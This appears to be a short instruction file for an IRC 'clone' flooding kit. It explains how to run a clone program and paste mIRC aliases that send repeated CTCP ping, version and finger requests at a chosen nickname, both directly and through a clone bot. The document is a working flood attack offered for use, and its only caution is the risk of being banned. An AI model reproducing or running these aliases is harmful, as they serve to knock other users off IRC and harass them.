Clone.ini Instructions Fist of all, run the clone.bat file that came with this. Now start mIRC like you do normally. Go into the menu TOOLS. Then Aliases. Copy these lines into it. /pingflood { /timer 40 1 /ctcp $$1 ping } /verflood { /timer 40 1 /ctcp $$1 version } /fingerflood { /timer 40 1 /ctcp $$1 finger } /pingkill { /ctcp JOELAMER PINGFLOOD $$1 /pingflood $$1 } /verkill { /ctcp JOELAMER VERFLOOD $$1 /verflood $$1 } /fingerkill { /ctcp JOELAMER FINGERFLOOD $$1 /fingerflood $$1 } /killclone /ctcp JOELAMER KILLCLONE /loadclone /run clone.exe -iclone.ini OK now when your on IRC type /loadclone then tell it what server to go to then either /pingflood /verflood /fingerflood Be warned though, most servers dislike clones and flooding, so you may wind up klined or glined. Also it may won't work since some people have flood protection.